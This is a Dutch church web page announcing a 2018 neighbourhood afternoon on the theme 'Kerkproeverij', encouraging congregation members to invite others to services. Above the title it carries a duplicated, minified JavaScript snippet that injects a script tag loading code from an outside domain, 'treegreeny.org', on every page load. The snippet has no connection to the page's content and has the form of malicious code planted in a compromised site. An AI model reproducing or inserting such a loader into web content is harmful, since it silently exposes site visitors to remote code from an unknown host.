;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Wijkmiddag Nij Tjaerda 23 januari 2018 'Kerkproeverij' - PKN Damwâld

Wijkmiddag Nij Tjaerda 23 januari 2018 ‘Kerkproeverij’

Gepubliceerd op: woensdag 10 januari 2018

Dinsdagsdag 23 januari 2018 wordt er weer een gezamenlijke wijkmiddag georganiseerd voor alle bewoners en omwonenden van Nij Tjaerda. Het begint om 14.30 uur. Het (PKN-) thema  “Kerkproeverij” staat daarin centraal. We hopen op een goede opkomst en een geslaagde middag.

Kerkproeverij …  het landelijke initiatief om mensen te laten proeven aan de kerk, maar ook om de kerk te helpen om missionair te groeien. Bij uitstek dus ook een zeer uitdagend thema voor de wijkavonden van dit (kerkelijk-) seizoen.

Kerkproeverij? De kerk proeven, kan dat? Dat is misschien uw eerste gedachte bij het woord Kerkproeverij. Bij proeverij denk je aan eten en drinken, maar aan de kerk? Toch is dat de grote gedachte achter deze wijkmiddag. Dat we als ‘trouwe’ gemeenteleden we (iets) meer vertrouwd raken met het idee dat we een uitnodigende gemeente mogen zijn. Een uitnodigende, gastvrije gemeente zijn waar iedereen zich welkom voelt. Dat is een streven wat we allemaal wel herkennen, maar wanneer hebt u voor het laatst echt iemand uitgenodigd om mee te gaan naar de kerk of samen te luisteren naar een dienst? Waarom vinden we het zo lastig om ons geloof te delen of om onze vrienden uit te nodigen voor de zondagse dienst? Gastvrij zijn is één ding, maar hoe nodig je mensen daadwerkelijk uit om (weer) eens mee te gaan naar de kerk? Want de ander uitnodigen om naar de kerk te gaan, dat is niet altijd makkelijk.  Proef de kerk … en wellicht ook: smaak en zie dat God goed is, zoals  Psalm 34 zegt. Dat vraagt om vrijmoedigheid en rekening houden met mogelijke gasten.

Hoe zit dat met onze kerk en onze gemeente? Zijn we enthousiast over onze kerkdiensten, over de gang van zaken binnen onze gemeente? Zo enthousiast dat we andere mensen daarvoor uitnodigen? De wijkavond is dan ook een uitnodigende ‘spiegel’  en een regelrechte ‘uitdaging’ die ons wordt voorgehouden om (opnieuw) te laten proeven hoe waardevol de kerk is en hoe belangrijk het is om mensen die niet of weinig vertrouwd zijn met de kerk en het geloof de gelegenheid te geven een kerkdienst te bezoeken, het gemeenteleven te ervaren en  … ‘om het geloof te proeven’.

Veel mensen hebben in onze tijd niet of nauwelijks een idee wat er in een kerk gebeurt. En als ze al een idee hebben, klopt het vaak niet met de werkelijkheid. Het gros van alle kerkgangers heeft nog nooit iemand heeft uitgenodigd voor een kerkdienst. Gewoon omdat het niet in je opkomt. Of omdat je misschien denkt, dat de ander “nee” tegen je zal zeggen. Laat staan dat je eventuele lastige vragen zou kunnen krijgen: waarom jij dan wel naar de kerk gaat en hoe jij dan kan geloven in een God die liefde is, terwijl de wereld zo gebroken en verscheurd is? Als mensen jou waarderen, is het helemaal niet zo’n gek idee dat ze op je uitnodiging ingaan. Net zoals je een boek uitleent of iemand uitnodigt voor je verjaardag, zo is het ook helemaal niet meer zo gek om iemand uit te nodigen voor een kerkdienst.

En … er is een nog veel belangrijkere reden om alle schroom van je af te werpen. God zelf nodigt mensen uit om zich bij de kerk aan te sluiten en God  zelf is al met mensen bezig om hen ontvankelijk te maken om de uitnodiging te ontvangen. Nee, je hoeft mensen niet ‘over te halen’ om te komen, laat staan om ze te ‘bekeren’. Het is alleen jouw christelijke opdracht om de ander uit te nodigen.

Dus bid. Luister naar God wie je mag uitnodigen. En doe mee ! En laat je daarbij maar leiden door Gods liefde en vrede!